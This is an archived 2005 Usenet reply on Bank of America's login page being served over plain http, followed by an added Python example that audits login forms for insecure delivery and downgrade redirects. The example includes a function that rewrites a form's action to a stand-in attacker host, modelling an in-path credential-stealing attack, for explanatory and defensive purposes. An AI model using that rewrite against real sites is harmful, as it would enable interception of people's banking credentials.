Re: Bank of America - On Line Banking *NOT* Secure?

From: Mike Amling (nospam_at_nospam.com)
Date: 06/26/05


Date: Sun, 26 Jun 2005 02:26:14 GMT

John E. Hadstate wrote:
> "Neil - Salem, MA USA" <Neil@Salem.Massachusetts.USA> wrote
> in message news:KdSdnVk_E_9LFCDfRVn-ig@comcast.com...
>
>>Could someone please check out Bank of America's web site
>>at http://www.bankofamerica.com and examine it for poor or
>>non-existent security?
>>
>>
>>"To provide the fastest access to our home page for all of
>>our millions of customers and other visitors, we have made
>>signing in to Online Banking secure without making the
>>entire page secure. Again, please be assured that your ID
>>and passcode are secure and that only Bank of America has
>>access to them."
>>
>>In other words, they are saying, "Trust us."
>
>
> You can still connect to https://www.bankofamerica.com/ but
> they immediately redirect you to
> http://www.bankofamerica.com/. From a cursory examination
> of the Javascript, it looks like the login information is
> submitted using an https connection to a cgi application.
>
> However small the probability, it appears that there is a
> security hole in the redirection to http. If someone else
> is spoofing the address www.bankofamerica.com, the page your
> browser loads may not be from BOA's servers. In this case,
> who knows what will happen when you enter a username and
> password. Hint: it probably won't be good for you.

   Yes, and a MITM could just alter the downloaded javascript without
having to spoof the DNS. Some firewalls, not to mention all ISPs, are
capable of monitoring and changing http content.

> BOA is playing with fire. They are the bank who recently
> compromised the private information of a million Federal
> employees, including a US Senator or two. Being a customer
> of BOA, and having just received a letter from Citibank that
> my private information has been compromised, and being a
> customer of Wachovia who also has been compromised, I'm
> pretty fed up myself. There is just no excuse for this kind
> of thing.

   I agree. Sounds like grist for Schneier's Cryptogram.

--Mike Amling
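
A concrete illustration of the two points above (the login form arriving over http while its action is https, and the https-to-http redirect), as an added example that is not part of the original thread. The HTML, the bank.example hostnames and the attacker hostname are all constructed stand-ins; nothing here is Bank of America's actual markup or script.

```python
"""Added example: why a login form delivered over plain HTTP is not protected
by POSTing it to HTTPS.  SAMPLE_HTML is a constructed stand-in, not the real page."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: the page itself arrives over http://, the form posts to https://.
SAMPLE_PAGE_URL = "http://www.bank.example/"
SAMPLE_HTML = """
<html><body>
<form id="signin" method="post" action="https://login.bank.example/cgi-bin/signon">
  <input name="id" type="text">
  <input name="passcode" type="password">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""


class _FormFinder(HTMLParser):
    """Collect every <form> and note whether it carries a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            if (a.get("type") or "").lower() == "password":
                self._cur["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None


def login_form_actions(page_url, html):
    """Absolute action URLs of every form on the page that has a password field."""
    p = _FormFinder()
    p.feed(html)
    return [urljoin(page_url, f["action"]) for f in p.forms if f["has_password"]]


def audit_login_page(page_url, html):
    """Findings for a login page.  Two independent checks: where the credentials
    are POSTed, and how the page that builds the POST was itself delivered."""
    findings = []
    page_scheme = urlsplit(page_url).scheme
    for action in login_form_actions(page_url, html):
        if urlsplit(action).scheme != "https":
            findings.append("credentials posted in clear to " + action)
        if page_scheme != "https":
            # The hole discussed in the thread: the form and any script that
            # submits it can be altered by anyone on the path, so an https
            # action proves nothing about where the passcode ends up.
            findings.append("login form delivered over " + page_scheme
                            + "; page and its scripts can be altered in transit")
    return findings


def mitm_rewrite(html, attacker_action):
    """What an in-path attacker (ISP, hotspot, tampering firewall) does to the
    unprotected page: point the form at a host they control.  The rewritten
    action can itself be https, so a check that only looks for 'https' in the
    form action still passes."""
    return re.sub(r'action="[^"]*"', 'action="%s"' % attacker_action, html, count=1)


def is_downgrade(requested_url, redirected_to):
    """True when an https request was answered with a redirect to plain http."""
    return (urlsplit(requested_url).scheme == "https"
            and urlsplit(redirected_to).scheme == "http")


if __name__ == "__main__":
    print(audit_login_page(SAMPLE_PAGE_URL, SAMPLE_HTML))
    tampered = mitm_rewrite(SAMPLE_HTML, "https://login.bank.example.attacker.test/signon")
    print(login_form_actions(SAMPLE_PAGE_URL, tampered))
    print(is_downgrade("https://www.bank.example/", "http://www.bank.example/"))
```

Run it and the original and the tampered page produce the same single finding: both post to an https action, and both were delivered over http. That is the point of the thread: checking that the cgi target is https (as John did from the JavaScript) says nothing about whether the page you were given is the bank's, and the only fix is to serve the page carrying the form over https and not redirect away from it.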


